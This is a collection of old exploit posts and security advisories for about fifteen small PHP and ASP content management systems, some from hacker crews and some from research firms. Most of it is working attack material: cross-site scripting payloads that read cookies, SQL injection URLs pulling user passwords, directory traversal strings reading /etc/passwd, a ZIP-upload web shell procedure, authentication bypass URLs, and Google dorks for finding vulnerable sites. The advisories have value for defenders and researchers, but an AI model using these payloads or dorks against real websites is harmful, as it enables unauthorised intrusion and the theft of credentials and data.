exploits cms balitbang

# Exploit Title: W-Cms Multiple Vulnerability
# Date: 2012-01-09
# Author: th3.g4m3_0v3r
# Site:http://w-cms.info/
# Software Link: http://code.google.com/p/wcms/
# Dork: intext:"Powered by w-CMS"
# Version : [2.01]
# Tested on: Window 7
# Yogesh Kashyap, shubneet goel, w4rl0ck.d0wn, Chip, VzAcnY, Razzy, Sayan, Jaggi Panu, Darkgt
# www.h4ck3r.in, www.root-team.com, www.hackingmind.com, www.hackingcrackingtricks.in

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
www.h4ck3r.in            www.root-team.com             www.hackingmind.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

W-CMS cross site scripting
_______________

Vulnerable Link __________\/_____________________
_______________

http://localhost/index.php?bid=1&COMMENT=1 "XSS"
http://localhost/?p=3"XSS"
http://localhost/?bid=5&p=1"XSS"


http://localhost/?p=3<FORM action="Default.asp?PageId=-1"
method=POST id=searchFORMname=searchFORM
  style="margin:0;padding:0"><INPUT type="hidden" value=""
name="txtSEARCH"></FORM>

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
directory traversal attacks

This script is possibly vulnerable to directory traversal attacks

http://localhost/wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini
http://localhost/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Greetz To : 1337day.com ~ exploit-db.com ~ hackforums.net

-----------------------------------------------------------------------
AuraCMS (pfd.php) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author    : Arianom (arianom@indonesiancoder.com)
Homepage  : http://indonesiancoder.com
Vendor    : http://www.auracms.org/
Software    : AuraCMS Mod Block Statistik | http://iwan.or.id/download/lihat/1/2-1-6.html
Version    : 1.62
Date    : November 22, 2010
-----------------------------------------------------------------------



I.  POC & Exploit
-----------------------------------------------------------------------
http://localhost/pdf.php?id=140+AND+1=2+UNION+SELECT+ind0nesianc0der,1,2,3,4,5,6,7

II. Refrence
-----------------------------------------------------------------------
AuraCMS 1.62 (stat.php) Remote Code Execution Exploit  : http://www.exploit-db.com/exploits/4933/

III. Vendor patch
-----------------------------------------------------------------------
Currently manufacturers do not provide patches or upgrades.

IV. Credits
-----------------------------------------------------------------------
Allahu Akbar
INDONESIAN CODER ~ Kill-9 Crew ~ MC Crew 
Don Tukulesto ~ kaMtiEz ~ ibl13z ~ N4ck0 ~ Yurakha ~ aN93l1c ~  Mboys ~ Contrex ~  n4KuLa_ 
k4L0ng666 ~ Xr0b0t ~ kido ~ t3ll0 ~ cimpli ~ Pathloader

V. Poem
-----------------------------------------------------------------------
Kami adalah manusia biasa yang gemar belajar.
Kami suka mempelajari hal apa saja, termasuk sesuatu yang menurut orang lain aneh atau asing bagi mereka.
Kami disini hanya ingin berbagi, bukan untuk bersaing.

Indonesian Coder Family

=============================
Vulnerability ID: HTB22718
Reference: http://www.htbridge.ch/advisory/lfi_in_exponent_cms_1.html
Product: Exponent CMS
Vendor: http://www.exponentcms.org/ ( http://www.exponentcms.org/ ) 
Vulnerable Version: 2.0.0pr2
Vendor Notification: 22 November 2010 
Vulnerability Type: Local File Inclusion
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/rss.php" script to properly sanitize user-supplied input in module variable.

The following PoC is available:

http://exponent/rss.php?module=../../../../../../../etc/passwd%00


=============================
Vulnerability ID: HTB22717
Reference: http://www.htbridge.ch/advisory/lfi_in_exponent_cms.html
Product: Exponent CMS
Vendor: http://www.exponentcms.org/ ( http://www.exponentcms.org/ ) 
Vulnerable Version: 2.0.0pr2
Vendor Notification: 22 November 2010 
Vulnerability Type: Local File Inclusion
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/podcast.php" script to properly sanitize user-supplied input in module variable.

The following PoC is available:


http://exponent/podcast.php?module=../../../../../../../etc/passwd%00

==================================
Vulnerability ID: HTB22743
Reference: http://www.htbridge.ch/advisory/sql_injection_in_injader_cms_1.html
Product: Injader CMS
Vendor: http://www.injader.com/ ( http://www.injader.com/ ) 
Vulnerable Version: 2.4.4
Vendor Notification: 07 December 2010 
Vulnerability Type: SQL Injection
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in "IJ-Login" variable from cookie.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:


GET /index.php HTTP/1.1
Cookie: IJ-Login=123'SQL_CODE_HERE


==================================
Vulnerability ID: HTB22744
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_injader_cms.html
Product: Injader CMS
Vendor: http://www.injader.com/ ( http://www.injader.com/ ) 
Vulnerable Version: 2.4.4
Vendor Notification: 07 December 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "/login.php" script to properly sanitize user-supplied input in "Referer" variable.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

The following PoC is available:


GET /login.php HTTP/1.1
Referer: "><script>alert('XSS');</script>

Advisory:            AdaptCMS 2.0.1 Multiple security vulnerabilities
Advisory ID:             SSCHADV2011-018
Author:                  Stefan Schurtz
Affected Software:    Successfully tested on AdaptCMS 2.0.1
Vendor URL:            http://www.adaptcms.com/
Vendor Status:         fixed
CVE-ID:                  -

==========================
Vulnerability Description:
==========================

AdaptCMS 2.0.1 is prone to multiple security vulnerabilities

==================
Technical Details:
==================

Cross-site Scripting

http://<target>/AdaptCMS/admin.php?view=</script><script>alert(document.cookie)</script>
http://<target>/AdaptCMS/admin.php?view=share&amp;do=</script><script>alert(document.cookie)</script>
http://<target>/AdaptCMS//?'</script><script>alert(document.cookie)</script>
http://<target>/AdaptCMS//index.php?'</script><script>alert(document.cookie)</script>

Authentication bypass / Information Disclosure

http://<target>/AdaptCMS/admin.php?view=/&amp;view=settings
http://<target>/AdaptCMS/admin.php?view=/&amp;view=users
http://<target>/AdaptCMS/admin.php?view=/&amp;view=groups
http://<target>/AdaptCMS/admin.php?view=/&amp;view=levels
http://<target>/AdaptCMS/admin.php?view=/&amp;view=stats

=========
Solution:
=========

"Get the latest AdaptCMS Files" from the admin area

====================
Disclosure Timeline:
====================

24-Sep-2011 - informed developers
24-Sep-2011 - Release date of this security advisory
25-Sep-2011 - fixed by vendor
25-Sep-2011 - post on BugTraq

========
Credits:
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.adaptcms.com/
http://www.insanevisions.com/article/293/News/AdaptCMS-201-Security-Hole
http://www.rul3z.de/advisories/SSCHADV2011-018.txt

=========================================
Vulnerability ID: HTB22528
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_allinta_cms.html
Product: Allinta CMS
Vendor: Allinta ( http://www.allinta.com/ ) 
Vulnerable Version: Current at 22.07.2010 and Probably Prior Versions
Vendor Notification: 26 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "/languageselect.asp" script to properly sanitize user-supplied input in multiple variables. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:


http://host/languageselect.asp?lang_URL=Default.asp%3Flang%3D&ss=x%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&img=1
http://host/languageselect.asp?lang_URL=Default.asp%27};alert%28document.cookie%29;{a=%27%3Flang%3D&ss=x&img=1


=========================================
Vulnerability ID: HTB22529
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_allinta_cms_1.html
Product: Allinta CMS
Vendor: Allinta ( http://www.allinta.com/ ) 
Vulnerable Version: Current at 22.07.2010 and Probably Prior Versions
Vendor Notification: 26 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "faqAE.asp" script to properly sanitize user-supplied input in "i" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:


http://host/path_to_admin/faqAE.asp?m=edit&i=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E


=========================================
Vulnerability ID: HTB22530
Reference: http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_allinta_cms.html
Product: Allinta CMS
Vendor: Allinta ( http://www.allinta.com/ ) 
Vulnerable Version: Current at 22.07.2010 and Probably Prior Versions
Vendor Notification: 26 July 2010 
Vulnerability Type: SQL Injection
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "contentAE.asp" script to properly sanitize user-supplied input in "i" variable. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

Attacker can use browser to exploit this vulnerability. The following PoC is available:


http://host/path_to_admin/contentAE.asp?m=edit&i=376+ANY_SQL_HERE



=========================================
Vulnerability ID: HTB22531
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_allinta_cms_2.html
Product: Allinta CMS
Vendor: Allinta
Vulnerable Version: Current at 22.07.2010 and Probably Prior Versions
Vendor Notification: 26 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "menuCodeAE.asp" script to properly sanitize user-supplied input in "i" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:


http://host/path_to_admin/menuCodeAE.asp?m=edit&i=185%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E


=========================================
Vulnerability ID: HTB22532
Reference: http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_allinta_cms_1.html
Product: Allinta CMS
Vendor: Allinta ( http://www.allinta.com/ ) 
Vulnerable Version: Current at 22.07.2010 and Probably Prior Versions
Vendor Notification: 26 July 2010 
Vulnerability Type: SQL Injection
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "templatesAE.asp" script to properly sanitize user-supplied input in "i" variable. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

Attacker can use browser to exploit this vulnerability. The following PoC is available:


http://host/path_to_admin/templatesAE.asp?m=edit&i=1+ANY_SQL_HERE

Vulnerability ID: HTB23010
Reference: http://www.htbridge.ch/advisory/multiple_xss_in_free_simple_cms.html
Product: Free Simple CMS
Vendor: Dustin Cowell Enterprises ( http://www.freesimplesoft.com/ )
Vulnerable Version: 1.0 and probably prior
Tested on: 1.0
Vendor Notification: 25 May 2011
Vulnerability Type: XSS (Cross Site Scripting), Local File Inclusion
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Free Simple CMS , which can be exploited to perform cross-site scripting attacks.

1) Input appended to the URL after index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website

The following PoC code is available:

http://[host]/index.php/%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C
/script%3E

2) Input passed via the GET "db_themes_background_color_page" parameter to /themes/default/index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC code is available:

http://[host]/themes/default/index.php?db_themes_background_color_page=%
22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E

Successful exploitation of the vulnerabilities requires that "register_globals" is enabled.

3) Input passed via the GET "include" parameter to index.php (when GET "page" parameter is set to "login" and GET "request" parameter is set to "forgot_password") is not properly verified before being used to include files.
This can be exploited to include arbitrary files from local resources via directory traversal sequences.

The following PoC code is available:

http://[host]/index.php?page=login&request=forgot_password&include=../..
/../../../../../../etc/passwd

Constructr CMS 3.03 Miltiple Remote Vulnerabilities (XSS/SQLi)


Vendor: phaziz interface design
Product web page: http://www.constructr-cms.org
Affected version: 3.03.0

Summary: ConstructrCMS is a new and fresh Content Management
System build with the Power of PHP and MySQL. The Backend is
mostly controlled by Ajax for a unique User Experience.

Desc: The CMS suffers from several vulnerabilities (SQL and XSS).
The sql issue can be triggered when the app tries to parse malicious
arguments to the 'page_id' in the /xmlOutput/constructrXmlOutput.content.xml.php
script with user input not validated. The result can be seen in the source
code of the page itself. The xss issue (GET) is thru 'user' and 'hash' parameter in
the /backend/login.php script.

-------------------------------------------------------------------

32: $PAGE_ID = $_REQUEST['page_id'];
...
40:    $select_content = $conContent -> query("
41:           SELECT *
42:           FROM $DB_TABLE_CONSTRUCTR_CONTENT
43:           WHERE page_id = '$PAGE_ID'
44:           ORDER BY sort ASC
45:    ")or die(mysql_error());
...
51:      while ($all_content = $conContent -> fetch_array($select_content))
52:      {
53:           $id            = $all_content['id'];
54:           $page_id       = $all_content['page_id'];
...

-------------------------------------------------------------------

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.14 (Win32)
           PHP 5.3.1
           MySQL 5.1.41 

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com


Advisory ID: ZSL-2011-5001
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5001.php


10.03.2011


PoC:

[SQL] http://constructr/xmlOutput/constructrXmlOutput.content.xml.php?page_id='[INJECT POINT];--";--

[XSS] http://constructr/backend/login.php?installed=101&amp;no_user_rights=101&amp;login_first_echo=101&amp;already_logged_in=101&amp;login_user_deactivated=101&amp;login_failed=101&amp;login_success=101&amp;nosaltnpepper=101&amp;user=101<script>alert(2)</script>&amp;hash=101<script>alert(2)</script>

+===================================================================================+
            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _           
            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ / 
            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   /
              _______\  \_ _ \  \2_0_0_9 |      \  |  | /   /____
            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+

    [?] ~ Note : sEc-r1z CrEw# r0x !
==============================================================================
    [?] LayoutCMS 1.0 (SQL/XSS) Multiple Remote Vulnerabilities
==============================================================================
    [?] My home:              [ http://sec-r1z.com ]
    [?] Script:               [ LayoutCMS 1.0 ]
    [?] Language:             [ PHP ]
    [?] Vendor                [http://layoutcms.com/]
    [?] Founder:              [ ./Red-D3v1L ]
    [?] Gr44tz to:            [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ]
    [?] Fuck To :             [ Zombie_KsA << big big big L4m3r ] 
########################################################################

===[ Exploit SQL ]===

[»]Exploit : [Path]/preview.php?id=[inject c0dE]

[»]dem0: http://layoutcms.com/demo/preview.php?id=-1+union+select+1,2,concat%28pass,0x3e,uname%29,4,5,6,7,8,9,10+from+layout_demo.users

[~] look For ThE Title xD


==============================================================================

===[ Exploit XSS ]===

[»]Exploit : [Path]/preview.php?id=[XSS Vuln]

[»]dem0: http://layoutcms.com/demo/preview.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

==============================================================================

#sEc-r1z.com Str1kEz y0u !

# Exploit Title: chillyCMS 1.3.0 Multiple Vulnerabilities
# Google Dork: "powered by chillyCMS"
# Date: 15 February 2013
# Exploit Author: Abhi M Balakrishnan
# Vendor Homepage: http://chillycms.bplaced.net/
# Software Link: http://chillycms.bplaced.net/chillyCMS/media/files/chillyCMS_full.zip
# Version: 1.3.0
# Tested on: uWAMP 2.1 (PHP 5.2.17, MySQL 5.5.9), Windows 8
# Video: http://www.youtube.com/watch?v=6B3rND9S75g


# Vulnerability
  Failure to Restrict URL Access
  chillyCMS uses 302 redirects to restrict access to the unautorized pages.

# Exploit
    Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/chillyCMS/
    Step 2: Access http://localhost/chillyCMS/admin/


# Vulnerability
  Arbitrary File Upload
  chillyCMS/admin/design.site.php page extracts all uploaded ZIP files to chillyCMS/tmp directory

# Exploit
    Step 1: Create a ZIP file of the files to be uploaded. Example: Compress shell.php to get shell.zip
    Step 2: Upload shell.zip
  Step 3: Access the shell at http://localhost/chillyCMS/tmp/shell.php

# History
  11 March 2012 - Discovered vulnerability and exploit, contacted the vendor.
  12 March 2012 - Vendor responds back, exchanges few mails.
  15 November 2012 - Vendor discontinues further development.
  15 February 2013 - Published the vulnerabilities and exploits to the public.

# How to reproduce
  The latest download from the website was not working on fresh install. An earlier version (1.1.3) has been installed and all the PHP files, except config.php, have been replaced with new files.

Advisory:               Yet Another CMS 1.0 SQL Injection & XSS vulnerabilities
Advisory ID:            SSCHADV2011-031
Author:                 Stefan Schurtz
Affected Software:      Successfully tested on Yet Another CMS 1.0
Vendor URL:             http://yetanothercms.codeplex.com/
Vendor Status:          informed

==========================
Vulnerability Description:
==========================

Yet Another CMS 1.0 is prone to multiple SQL Injection and XSS vulnerabilities

==================
Technical Details:
==================

// search.php
$result_set = get_search_result_set($_POST['pattern']);

// includes/functions.php
function get_search_result_set($pattern, $public = true) {
      global $connection;
      $query = "SELECT
                   id,
                   subject_id,
                   menu_name,
                   position,
                   visible,
                   content,
                   CONCAT('... ', SUBSTRING(content, LOCATE('" . $pattern . "',content), 200), ' ...') as fragment
                FROM
                   pages
                WHERE
                   content like '%" . $pattern . "%'";

// index.php
<?php find_selected_page(); ?>

// includes/functions.php
function find_selected_page() {
                global $sel_subject;
                global $sel_page;
                if (isset($_GET['subj'])) {
                        $sel_subject = get_subject_by_id($_GET['subj']);
                        $sel_page = get_default_page($sel_subject['id']);
                } elseif (isset($_GET['page'])) {
                        $sel_subject = NULL;
                        $sel_page = get_page_by_id($_GET['page']);
                } else {
                        $sel_subject = NULL;
                        $sel_page = NULL;
                }
}


function get_page_by_id($page_id) {
                global $connection;
                $query = "SELECT * ";
                $query .= "FROM pages ";
                $query .= "WHERE id=" . $page_id ." ";
                $query .= "LIMIT 1";

==================
Exploit
==================

SQL Injection

http://<target>/index.php?page=[sql injection]
http://<target>/search.php -> 'search field' -> [sql injection]

XSS

http://<target>/search.php -> 'search field' -> '"</script><script>alert(document.cookie)</script>
http://<target>/index.php?page='</script><script>alert(document.cookie)</script>

====================
Disclosure Timeline:
====================

18-Oct-2011 - informed developers

========
Credits:
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References:
===========

http://yetanothercms.codeplex.com/
http://yetanothercms.codeplex.com/workitem/643
http://www.rul3z.de/advisories/SSCHADV2011-031.txt

===================================================================
    Tugux CMS 1.2 Multiple vulnerability (BLIND sql & xss)
===================================================================

Software:   Tugux CMS
Vendor:     www.tugux.com
Vuln Type:  BLind SQL Injection
Download link:  http://www.tugux.com/uploads/47/tugux_cms.rar
Author:     eidelweiss
contact:    admin[at]eidelweiss[dot]info
Home:       www.eidelweiss.info


References: http://eidelweiss-advisories.blogspot.com/2011/07/tugux-cms-12-multiple-vulnerability.html

===================================================================
  Vuln c0de on page_text.php

<?php 

session_start();
require_once "scripts/connect_to_mysql.php";


if (isset($_GET['pid'])){
$pageid=$_GET['pid'];
//------------------------------------------------
$sqlCommand="SELECT lastmodified FROM pages WHERE id='$pageid' LIMIT 1";
$query=mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row=mysqli_fetch_array($query)) {
      $date = $row["lastmodified"];
}
mysqli_free_result($query);

//------------------------------------------------
//------------------------------------------------
$sqlCommand = "SELECT admin FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1";
$query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row = mysqli_fetch_array($query)){
  $admin = $row["admin"];
  }
mysqli_free_result($query);
//------------------------------------------------
//------------------------------------------------
$sqlCommand = "SELECT pagebody FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1";
$query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row = mysqli_fetch_array($query)){
  $body = $row["pagebody"];
  }
mysqli_free_result($query);
}
//------------------------------------------------
if (isset($_GET['nid'])){
  $nid=$_GET['nid'];
$sql=mysqli_query($myConnection,"SELECT title, date, admin, news FROM news WHERE id='$nid'") or die (mysqli_error($myConnection));


===================================================================

    exploit &amp; p0c

[!] page_text.php?nid=[valid nid]
[!] page_text.php?pid=[valid pid]

    Example p0c

[!] http://server/page_text.php?nid=12    <= True
[!] http://server/page_text.php?nid=-12   <= False

[!] http://server/page_text.php?pid=51  <= True
[!] http://server/page_text.php?pid=-51  <= False


[+] http://server:3306    <= download the file , save and open with c++ or wordpad will show mysql version

[!] sample: http://server:3306 result : 5.0.92-community (use versi 5.0.92) :D

===================================================================

Software:   Tugux CMS
Vendor:     www.tugux.com
Vuln Type:  xss
Download link:  http://www.tugux.com/uploads/47/tugux_cms.rar
Author:     eidelweiss
contact:    admin[at]eidelweiss[dot]info
Home:       www.eidelweiss.info

====================================================================

comments.php file is persistant to xss attack

Go to 

http://server/comments.php

and put or type this xss c0de into the command box

';alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//\';alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//";alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//\";alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))</SCRIPT><script>alert(document.cookie)</script>

then the site will direct you to

http://server/latest.php?nid=

and there you go.. xss will pop up

p0c:
http://server/comments.php
or
http://server/path/comments.php

official site: http://www.tugux.com/comments.php

Gratz:

- YOGYACARDERLINK , DEVILZC0DE , etc
- Nofia Fitri (unyu²), whitehat, note, petimati, psycothic_girl, viska agasi (dudutzkuw), wenkhairu, etc (capek aja di ketik semua)

====================================================================

    Nothing Impossible In This World Even Nobody`s Perfect

      Hacking is Art

===================================================================

==========================| -=[ E0F ]=- |==========================

# Exploit Title: CompactCMS 1.4.1 Multiple Vulnerabilities
# Google Dork:   intext:"Maintained with CompactCMS.nl" intitle:"Print: *"
# Date:          17-12-2010
# Author:        NLSecurity
# Software Link: http://files.compactcms.nl/stable/
# Version:       CompactCMS 1.4.1
# Credits:       http://www.nlsecurity.org/
# Extra:         irc.6667.eu  #main

Description:

CompactCMS 1.4.1 has multiple XSS and File Disclosure vulnerabilities. These file disclosures will
appear if the users have access to view open directories.

--- File Disclosures ---

/admin/includes/modules/backup-restore/
/admin/includes/modules/backup-restore/content-owners/
/admin/includes/modules/backup-restore/module-management/
/admin/includes/modules/backup-restore/permissions/
/admin/includes/modules/backup-restore/template-editor/
/admin/includes/modules/backup-restore/user-management/

/admin/includes/fancyupload/
/admin/includes/fancyupload/Assets/
/admin/includes/fancyupload/Assets/Icons/

/admin/includes/fancyupload/Backend/
/admin/includes/fancyupload/Backend/Assets/
/admin/includes/fancyupload/Backend/Assets/getid3/

/admin/includes/fancyupload/Language/
/admin/includes/fancyupload/Source/
/admin/includes/fancyupload/Source/Uploader/

/admin/includes/edit_area/
/admin/includes/edit_area/images/
/admin/includes/edit_area/langs/
/admin/includes/edit_area/reg_syntax/

/admin/img/mochaui/
/admin/img/styles/
/admin/img/uploader/

/_docs/

... Perhaps more, but this should give an idea. :-)

--- Cross-Site Scripting Vulnerabilities (XSS) ---

/afdrukken.php?page=">[XSS]

This can be found on line 48:
<strong><a href="<?php echo $ccms['rootdir'];?><?php echo ($_GET['page']!=$cfg['homepage'])?$_GET['page'].'.html':null; ?>"><?php echo $ccms['lang']['system']['tooriginal']; ?></a></strong>
Vuln: $_GET['page']

---

/admin/includes/modules/permissions/permissions.Manage.php?status=notice&amp;msg=[XSS]

This can be found on line 62:
<?php if(isset($_GET['msg'])) { echo '<span class="ss_sprite ss_confirm">'.$_GET['msg'].'</span>'; } ?>
Vuln: $_GET['msg']

---

/lib/includes/auth.inc.php
Username input field (userName) has an XSS vulnerability when using POST data.

This can be found on line 119:
<label for="userName"><?php echo $ccms['lang']['login']['username']; ?></label><input type="text" class="alt title" autofocus placeholder="username" name="userName" style="width:300px;" value="<?php echo (!empty($_POST['userName'])?$_POST['userName']:null);?>" id="userName" />
Vuln: $_POST['userName']

#########################################################################

[+] Exploit Title : content Management PHPCMS 3.0 [ Sql Injection
Vunerability ]
[~] Author : ThunDEr HeaD
[~] Contact : thunderhead10@gmail.com
[~] Date : 11-01-2011
[~] HomePage : www.indishell.in
[~] Version : 1.2 , 3.0
[~] Tested on : PBL Technology
[~] Vulnerability Style : PHPCMS [ Sql Injection Vunerability ]

#########################################################################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<3 Love: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k,
Th3 RDX, G00g!3 W@rr!0r, Mahi ,
eXeSoul, str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                           ......\m/ INDIAN CYBER ARMY \m/......
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



Vulnerability:

*SQL injection Vulnerability*


[#] http://server/cms.php?categoryid=10

[#] http://server/cms.php?categoryid=[SQLi]




-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam

=> c0d3 for motherland, h4ck for motherland



     Enj0y! :D


[#] DOne now time to rock \m/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 11 feb 2011

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#End 0Day#

|||[!]===========================================================================[!]

[~] DynMedia Pro Web CMS 4.0 ||Local File Disclosure Exploit|
|[~] Author : Mbah_Semar (fuji@undiphacker.net)
[~] Homepage : http://www.indonesianhacker.or.id | http://suramcrew.org
| http://www.masfuji.us
[~] Date : 22 April, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://www.vinyadmedia.com
[+] License : Commercial
[+] Vulnerability : ||||Local File Disclosure|
|[+] Dork : "Powered by Vinyad dynMedia�Pro 4.0"
[+] Version : 4.0

[!]===========================================================================[!]

[ Vulnerable File ]
    http://www.example.com/downloadfile.php?dwnfile=[LFD]



[ Example ]

    http://www.example.com/downloadfile.php?dwnfile=../library/dbconnect.php


[!]===========================================================================[!]

[ Thanks TO ]

[+] Indonesian Hacker Team
[+] Virgi aka Bl4ck_b0x, gisa maho, Lukas Ranger Zero-Line, Aanz, Angga,
riv182, sudden_death, alusius, and you.
